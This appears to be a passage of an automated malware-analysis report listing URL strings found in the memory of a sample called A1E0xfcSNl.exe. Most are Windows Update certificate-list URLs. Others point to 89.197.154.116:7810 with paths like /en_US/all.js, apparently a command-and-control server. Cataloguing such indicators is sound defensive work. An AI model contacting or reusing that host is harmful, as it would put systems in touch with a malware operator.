          Source: A1E0xfcSNl.exe, 00000000.00000003.2805877584.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2575782822.00000000039FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625562236.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625686592.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2638500805.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2615920623.00000000039F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11987e592cac6
          Source: A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2721210841.00000000039FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1bd4e0020130a
          Source: A1E0xfcSNl.exe, 00000000.00000003.2662905991.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637546484.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2651175055.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625402864.0000000003A18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1c7bb69fbb7ef
          Source: A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?206335be2112e
          Source: A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2889324959.0000000003A1A000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903844664.0000000003A1A000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?379de8c2583ed
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673851598.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2674815841.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2674540264.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2674943880.00000000039F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3ceef9ea5f336
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3dd6a9b033069
          Source: A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?49417627e635c
          Source: A1E0xfcSNl.exe, 00000000.00000003.2853918191.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2855323562.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?69c3c58cd8d4e
          Source: A1E0xfcSNl.exe, 00000000.00000003.2598576195.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7fe4746b978ee
          Source: A1E0xfcSNl.exe, 00000000.00000003.2756572032.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9926f10342b95
          Source: A1E0xfcSNl.exe, 00000000.00000003.2744902985.0000000003A06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a6d0c8e63b213
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2879314585.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2879314585.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ad1b3d16883af
          Source: A1E0xfcSNl.exe, 00000000.00000003.2830432845.00000000039FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c63bb198e70dc
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ddd978b2426bf
          Source: A1E0xfcSNl.exe, 00000000.00000003.2768085189.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806484117.00000000039FE000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2783909509.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2782832541.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2784047530.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2792724674.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2783522079.00000000039FC000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2805877584.00000000039FC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?eca10e5755dad
          Source: A1E0xfcSNl.exe, 00000000.00000003.2662905991.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673851598.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2663639953.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2662520472.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2651048419.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2651175055.0000000003A18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ee3d636b31fbc
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabp
          Source: A1E0xfcSNl.exe, 00000000.00000003.1787137011.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2769115094.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756222341.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756717399.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
          Source: A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/rueB
          Source: A1E0xfcSNl.exe, 00000000.00000003.2637123523.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2574726157.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2610184152.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2588229355.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2625193016.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2587577247.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2597793401.0000000003A69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11987e592c
          Source: A1E0xfcSNl.exe, 00000000.00000003.2735305600.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2719700549.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744211745.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2733333181.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2755824852.0000000003A69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1bd4e00201
          Source: A1E0xfcSNl.exe, 00000000.00000003.2914281384.0000000003A69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?206335be21
          Source: A1E0xfcSNl.exe, 00000000.00000003.2673341320.0000000003A69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3ceef9ea5f
          Source: A1E0xfcSNl.exe, 00000000.00000003.2967121042.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2977577154.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3dd6a9b033
          Source: A1E0xfcSNl.exe, 00000000.00000003.2792724674.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2805877584.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2830837440.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2816663192.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2830350068.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?49417627e6
          Source: A1E0xfcSNl.exe, 00000000.00000003.2840042170.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?69c3c58cd8
          Source: A1E0xfcSNl.exe, 00000000.00000003.2744211745.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9926f10342
          Source: A1E0xfcSNl.exe, 00000000.00000003.2865992163.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2878495999.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ad1b3d1688
          Source: A1E0xfcSNl.exe, 00000000.00000003.2840042170.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2830837440.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2853486155.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2816663192.0000000003A69000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2830350068.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c63bb198e7
          Source: A1E0xfcSNl.exe, 00000000.00000003.2768561421.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?eca10e5755
          Source: A1E0xfcSNl.exe, 00000000.00000003.2651000762.0000000003A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ee3d636b31
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2612763222.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2575316910.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/
          Source: A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/.net
          Source: A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810//
          Source: A1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/SX
          Source: A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/dll
          Source: A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.js
          Source: A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.js-Ce
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.js4
          Source: A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsA
          Source: A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsB
          Source: A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsG2
          Source: A1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsKi
          Source: A1E0xfcSNl.exe, 00000000.00000003.2866742745.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2598576195.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2662520472.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2769115094.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2744289857.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756222341.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2673578388.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2855323562.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2663639953.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2756717399.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, 
A1E0xfcSNl.exe, 00000000.00000003.2853918191.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2709742244.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsM9
          Source: A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsP
          Source: A1E0xfcSNl.exe, 00000000.00000003.2879314585.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2890231842.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsZ0
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsb
          Source: A1E0xfcSNl.exe, 00000000.00000003.2793173941.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2709742244.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2780187927.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564242417.00000000039A1000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564344046.00000000039CD000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2904698086.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2720408020.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2573493710.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2903284596.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2563680413.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2914656617.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jshic
